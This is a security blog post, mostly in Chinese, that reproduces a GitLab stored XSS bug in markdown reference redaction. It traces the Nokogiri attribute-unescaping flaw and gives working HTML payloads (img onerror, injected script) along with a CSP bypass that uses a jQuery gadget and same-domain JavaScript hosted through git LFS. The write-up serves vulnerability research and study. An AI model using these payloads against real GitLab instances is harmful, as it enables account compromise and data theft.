<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Reproduction: Gitlab Stored XSS in markdown when redacting references | sunriseXu’s bug hunting journey</title>
<meta name="generator" content="Jekyll v4.3.3" />
<meta property="og:title" content="Reproduction: Gitlab Stored XSS in markdown when redacting references" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Name" />
<meta property="og:description" content="Name" />
<link rel="canonical" href="http://localhost:4000/xss/2023/12/05/store-xss-in-markdown.html" />
<meta property="og:url" content="http://localhost:4000/xss/2023/12/05/store-xss-in-markdown.html" />
<meta property="og:site_name" content="sunriseXu’s bug hunting journey" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-12-05T10:31:06+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Reproduction: Gitlab Stored XSS in markdown when redacting references" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-12-05T10:31:06+08:00","datePublished":"2023-12-05T10:31:06+08:00","description":"Name","headline":"Reproduction: Gitlab Stored XSS in markdown when redacting references","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/xss/2023/12/05/store-xss-in-markdown.html"},"url":"http://localhost:4000/xss/2023/12/05/store-xss-in-markdown.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="sunriseXu&apos;s bug hunting journey" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">sunriseXu&#39;s bug hunting journey</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Reproduction: Gitlab Stored XSS in markdown when redacting references</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2023-12-05T10:31:06+08:00" itemprop="datePublished">Dec 5, 2023
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h2 id="name">Name</h2>

<blockquote>
  <p>Gitlab Stored XSS in markdown when redacting references</p>
</blockquote>

<h2 id="weakness">Weakness</h2>

<blockquote>
  <p>XSS</p>
</blockquote>

<h2 id="severity">Severity</h2>

<blockquote>
  <p>高危</p>
</blockquote>

<h2 id="environment">Environment</h2>

<blockquote>
  <p>Gdk version:
1b0e37a87f64ea5aad3ec9af1de9d563ca2a6a44
Gitlab version
v12.9.2-ee
Ubuntu version
18.04</p>
</blockquote>

<blockquote>
  <p>原文：<a href="https://hackerone.com/reports/836649">https://hackerone.com/reports/836649</a></p>
</blockquote>

<h2 id="url">URL</h2>

<h2 id="summary">Summary</h2>

<p>漏洞函数<code class="language-plaintext highlighter-rouge">redacted_node_content</code>负责渲染 markdown 的 reference 部分，其中 node 的<code class="language-plaintext highlighter-rouge">data-original</code>属性能够被注入 xss，导致<code class="language-plaintext highlighter-rouge">#{content}</code>包含该 xss 返回前端得到执行。
<em>lib/banzai/reference_redactor.rb:75</em></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def redacted_node_content(node)
      original_content = node.attr('data-original')
      link_reference = node.attr('data-link-reference')
      # Build the raw &lt;a&gt; tag just with a link as href and content if
      # it's originally a link pattern. We shouldn't return a plain text href.
      original_link =
        if link_reference == 'true'
          href = node.attr('href')
          content = original_content
          %(&lt;a href="#{href}"&gt;#{content}&lt;/a&gt;)
        end
</code></pre></div></div>

<h2 id="code-review">Code Review</h2>

<h3 id="pre-byebug">pre-byebug</h3>

<p>由于 ruby 版本比较老旧，无法使用 vscode 插件进行调试，选择 pre-byebug 手动调试。首先在代码行前插入 pre-byebug 断点 binding.pry，然后使用<code class="language-plaintext highlighter-rouge">bin/rails server</code>跑起来，遇到断点则自动停下。
尝试关闭 log 开启调试，<code class="language-plaintext highlighter-rouge">rails server --help</code>知道，加上后缀可以关闭 log
<code class="language-plaintext highlighter-rouge">bin/rails server --no-log-to-stdout</code>
另外还有 puma 的日志需要关闭：
<em>lib/gitlab/cluster/puma_worker_killer_initializer.rb:33</em> 添加：（见<a href="https://github.com/zombocom/puma_worker_killer">https://github.com/zombocom/puma_worker_killer</a>）
<code class="language-plaintext highlighter-rouge">config.reaper_status_logs = false</code></p>

<ol>
  <li>通过 drawio 画出<a href="https://drive.google.com/file/d/1RuaQELwDr-kQDS1XHNpDNi8Xh7EQ4WZI/view?usp=sharing">函数流关系图</a>。找到部分触发该漏洞函数的 controller。</li>
</ol>

<h3 id="review">Review</h3>

<ol>
  <li>直接通过 markdown preview 渲染来实时获取渲染片段。经过调试发现，用户的输入首先会进行 html 化，然后进行渲染。
<em>app/controllers/concerns/preview_markdown.rb</em>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>render json: {
      body: view_context.markdown(result[:text], markdown_context_params),
      references: {
        users: result[:users],
        suggestions: SuggestionSerializer.new.represent_diff(result[:suggestions]),
        commands: view_context.markdown(result[:commands])
      }
    }
</code></pre></div>    </div>
    <p><em>app/helpers/markup_helper.rb:99</em></p>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def markdown(text, context = {})
    return '' unless text.present?
    context[:project] ||= @project
    context[:group] ||= @group
    html = markdown_unsafe(text, context)
    # byebug
    prepare_for_rendering(html, context)
  end
</code></pre></div>    </div>
    <p>从 preview 的调用栈，可以看到首先将 markdown 转为 html，然后再对 html 进行处理。<code class="language-plaintext highlighter-rouge">markdown_unsafe</code>主要负责前中期 html 转换，<code class="language-plaintext highlighter-rouge">prepare_for_rendering</code>负责 html 的后期处理，当然问题出在这个后期处理上。</p>
  </li>
  <li>通过函数名推断，输入 reference 相关 markdown，可以触发漏洞函数，查询文档可以得知 reference 的 markdown 语法。<a href="https://docs.gitlab.com/ee/user/markdown.html#gitlab-specific-references">https://docs.gitlab.com/ee/user/markdown.html#gitlab-specific-references</a>。（ps:分析项目还是要结合文档进行分析，不然什么时候才时候头呢？）</li>
  <li>例如输入<code class="language-plaintext highlighter-rouge">@root</code>，这是一个用户引用 markdown，会引用 root 这个用户，那么第一个函数<code class="language-plaintext highlighter-rouge">markdown_unsafe</code>会返回 html:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;p data-sourcepos="1:1-1:5" dir="auto"&gt;
&lt;a href="/root" data-user="1" data-reference-type="user" data-container="body" data-placement="top" data-html="true" class="gfm gfm-project_member" title="Administrator"&gt;
@root&lt;/a&gt;
&lt;/p&gt;
</code></pre></div>    </div>
    <p>但是从漏洞函数分析，html 需要包含属性<code class="language-plaintext highlighter-rouge">data-origin</code>和<code class="language-plaintext highlighter-rouge">data-reference-link</code>这个两个值才行，特别是<code class="language-plaintext highlighter-rouge">data-reference-link</code>是必须的。</p>
  </li>
  <li>从文字着手分析，应该是包含链接的 reference，从文档查看，应该是：<code class="language-plaintext highlighter-rouge">[README](doc/README.md#L13)</code></li>
  <li>经过代码审计，发现 gitlab 特定的 markdown 有两种输入方式，分别是 markdown 和 html 格式，html 由 markdown 渲染而来，因此用户输入该 html 也能达到同等渲染效果，但是 html 的输入扩大了攻击面。
<em>gitlab-v12.9.2-ee/lib/banzai/pipeline/gfm_pipeline.rb</em>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># These filters transform GitLab Flavored Markdown (GFM) to HTML.
# The nodes and marks referenced in app/assets/javascripts/behaviors/markdown/editor_extensions.js
# consequently transform that same HTML to GFM to be copied to the clipboard.
# Every filter that generates HTML from GFM should have a node or mark in
# app/assets/javascripts/behaviors/markdown/editor_extensions.js.
# The GFM-to-HTML-to-GFM cycle is tested in spec/features/copy_as_gfm_spec.rb.
</code></pre></div>    </div>
    <p>因此直接对 markdown 渲染后的元素进行拷贝作为基准 payload，下面拷贝了引用 issue 的 markdown<code class="language-plaintext highlighter-rouge">#1</code>所渲染的 html:</p>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;a href="http://127.0.0.1:3000/xss/xxss/-/issues/1" data-original="#1" data-link="false" data-link-reference="false" data-project="20" data-issue="436" data-reference-type="issue" data-container="body" data-placement="top" data-html="true" title="xss"&gt;#1&amp;lt;img src=x&amp;gt;&lt;/a&gt;
</code></pre></div>    </div>
    <p>payload 中<code class="language-plaintext highlighter-rouge">#1&amp;lt;img src=x&amp;gt;</code>是主要部分。该部分原本是 escape 后的字符串，但是在后端处理时将其赋值给了属性值，而 Nokogiri 库自动对属性值进行 unescape。</p>
  </li>
  <li>ruby 库 Nokogiri 解析 html 字符串时，会把属性中 html encoded 字符进行 unencoded，最终造成注入问题。
<em>lib/banzai/filter/reference_filter.rb:132</em> 该函数将 html 字符串替换到 node 对象中，其中 html 字符串包含 escape 的属性值。
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def replace_link_node_with_href(node, link)
    html = yield
    binding.pry
    node.replace(html) unless html == link
end
</code></pre></div>    </div>
    <p>node.replace 是 nokogiri 库调用，该函数对 html 字符串进行解析，构建 html node 对象:
<em>/home/kali/.rvm/gems/ruby-2.6.5/gems/nokogiri-1.10.8/lib/nokogiri/xml/node.rb:477</em></p>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node_set = in_context(contents, options.to_i)
</code></pre></div>    </div>
    <p>其中解析字符串的函数由 nokogiri 的<a href="https://github.com/sparklemotion/nokogiri/blob/9aebcc669a7028e4faad1fc8b53cf46a2f2320ba/ext/nokogiri/xml_node.c#L2152">c 函数</a>实现。该函数负责解析属性和值，并且将属性值的 html 编码进行 unescape。</p>
  </li>
</ol>

<h3 id="step-to-reproduce">Step to reproduce</h3>

<ol>
  <li>首先新建一个非公开的 issue，然后再新建一个公开 issue</li>
  <li>在公开的 issue 中引用非公开的 issue 进行评论，并且注入 payload</li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>其中2是私密issue，该payload需要发送在issue1中
&lt;a href="http://127.0.0.1:3000/xss/xxss/-/issues/2" data-original="#2" data-link="false" data-link-reference="false" data-project="20" data-issue="437" data-reference-type="issue" data-container="body" data-placement="top" data-html="true" title="hacked"&gt;#2&amp;lt;img src=x onerror=alert(1)&amp;gt;&lt;/a&gt;
</code></pre></div></div>

<ol>
  <li>用其他账户登录，查看公开 issue，即可完成攻击</li>
  <li>现在能够注入任意 html 和 xss payload，但是如果有 csp，那么需要绕过，绕过方法可以考虑 jquery：构造一个需要全局初始化的 html 片段，然后由前端进行注入。</li>
</ol>

<h3 id="csp-bypass">csp bypass</h3>

<ol>
  <li>当然这些绕过是平时找到的 gadget，需要每天日积月累的审计源代码才能找到。也就是说每天都要 debug，每天都要静态分析，每天都要动态分析才行。这需要理解软件的逻辑，什么是软件的逻辑，包括路由，渲染，功能之类的，这绝对不是做个漏洞复现，切片就足够的。</li>
  <li>首先选定用 jquery 注入 script 标签的方式，通过 <code class="language-plaintext highlighter-rouge">\$\([</code>’”][\s\S]{0,100}?&lt;[\s\S]{3,200}?&gt;[\s\S]{0,100}?[<code class="language-plaintext highlighter-rouge">'"]\)</code> 来定位到。
<em>app/assets/javascripts/gl_field_error.js</em>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>this.fieldErrorElement = $(`&lt;p class='${errorMessageClass} hidden'&gt;${this.errorMessage}&lt;/p&gt;`);
</code></pre></div>    </div>
  </li>
  <li>逆向分析得知，该函数由 main.js 调用，也就是所谓的全局初始化代码
<em>app/assets/javascripts/gl_field_errors.js</em>
<em>app/assets/javascripts/main.js:337</em>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$('.gl-show-field-errors ').each((i, form) =&gt; new GlFieldErrors(form));
</code></pre></div>    </div>
  </li>
  <li>该段代码显示，只要注入 class 为 gl-show-field-errors 的片段，就能够被执行，那么构造 payload 如下：
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;input class="gl-show-field-errors gl-field-error-ignore" type=url title="&lt;script&gt;alert(11)&lt;/script&gt;"/&gt;
html encode:
&amp;lt;input class=&amp;quot;gl-show-field-errors gl-field-error-ignore&amp;quot; type=url title=&amp;quot;&amp;lt;script&amp;gt;alert(11)&amp;lt;/script&amp;gt;&amp;quot;/&amp;gt;
</code></pre></div>    </div>
    <p><img src="/assets/gitlab/1/referencexss.png" alt="referencexss" /></p>
  </li>
  <li>虽然成功注入了，但是没有触发，原因是注入的 html 代码是动态渲染的，而初始化前端在动态渲染之前就已执行完毕。</li>
  <li>看了作者的绕过方法，提供了两种绕过方法，其中一种是直接注入 script src 标签，并且 src 指向本域名的 js 文件。</li>
  <li>csp 绕过，通过上传 js 到同域名下，再用 script 标签直接引用该 js，gitlab 提供 git lfs 服务端和客户端来管理用户上传的文件，如果用该客户端上传文件，那么点击该文件的链接就会直接下载，并且域名相同。github 也提供该功能，但是文件被保存到另一个域名中了，但是 gitlab 却依然是同域名。</li>
  <li>以下为 lfs 的操作命令：
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://gitlab.com/sunriseXu/lfs.git
git lfs track "*.js"
vim test.js
git add . &amp;&amp; git commit -m 'test'
git push
git lfs ls-files
</code></pre></div>    </div>
  </li>
  <li>经过测试，发现 github 的查看和下载文件的链接都在 gitlab.com 域名中，但是即使不用 lfs 上传 js，其他文件的下载链接都是在 gitlab.com 域名中，所以 lfs 没有必要吧，经过测试还是有必要，报错如下：
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Refused to execute script from 'https://gitlab.com/1159309551xcz/lfs/-/raw/main/test?ref_type=heads&amp;inline=false' because its MIME type ('application/octet-stream') is not executable, and strict MIME type checking is enabled.
</code></pre></div>    </div>
    <p>就是说 script 的链接需要返回的 type 不能是 octet-stream
上传一个 lfs 的 js 文件，返回的类型是 text/javascript：</p>
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://gitlab.com/1159309551xcz/lfs/-/raw/main/test.js?ref_type=heads&amp;inline=false
</code></pre></div>    </div>
    <p>但是上传非 lfs 的 js 文件，返回的类型是 text/octet-stream 和 text/plain，这两种都无法执行，果然还是要 lfs 上传才行，这是 gitlab 一个潜在漏洞。</p>
  </li>
</ol>

<h2 id="tips">Tips</h2>

<ol>
  <li>从结论上说，该漏洞是底层库漏洞，nokogiri 从字符串创建 html 节点的过程存在漏洞，包括 nokogiri 的多个函数。该过程自动将属性中 html 编码进行反编码。而后续代码如果引用该编码码后的属性值插值到 html 字符串片段中，将引发 xss 注入。</li>
  <li>漏洞定位应聚焦于 nokogiri 解析 html 字符串的相关函数。例如 replace，parse，new 等函数，太多了，可以说 nokogiri 这种解析机制就是很大的问题。当然即使 unescape 属性值，也需要后续插值才能构建完整攻击流程。因此对于该漏洞点位进行定位太泛泛了。</li>
  <li>但是也有一些危险操作，例如将 node 的 text 也就是文本内容(通过 inner_html)方法获取，如果是 text，则自动 escape，如果是 node，则返回未编码的 html 字符串。危险的是将这些 inner_html 赋值给属性后转为 html 字符串，再次构建新 node 后，属性值就自动解码了，如果再次利用该属性值将带来危险。所以完成该攻击需要几个函数配合，那就是 nokogiri 的：
    <ul>
      <li>inner_html 函数：获取用户输入</li>
      <li>赋值操作：例如<code class="language-plaintext highlighter-rouge">%Q(data-#{key.to_s.dasherize}="#{escape_once(value)}")</code>，将内容赋值给属性
replace 等构建</li>
      <li>node 函数：<code class="language-plaintext highlighter-rouge">node.replace(str)</code>等函数</li>
      <li>获取属性值的函数 attr：<code class="language-plaintext highlighter-rouge">node.attr(xxx)</code>等函数</li>
    </ul>
  </li>
  <li>引申到 jquery 中：<code class="language-plaintext highlighter-rouge">attr</code>方法将 escape 后的字符串自动 unescape</li>
</ol>

  </div><a class="u-url" href="/xss/2023/12/05/store-xss-in-markdown.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">sunriseXu&#39;s bug hunting journey</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">sunriseXu&#39;s bug hunting journey</li><li><a class="u-email" href="mailto:github@example.com">github@example.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/jekyll"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">jekyll</span></a></li><li><a href="https://www.twitter.com/jekyllrb"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">jekyllrb</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>sunriseXu&#39;s bug hunting journey, sharing new findings of bug hunting.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
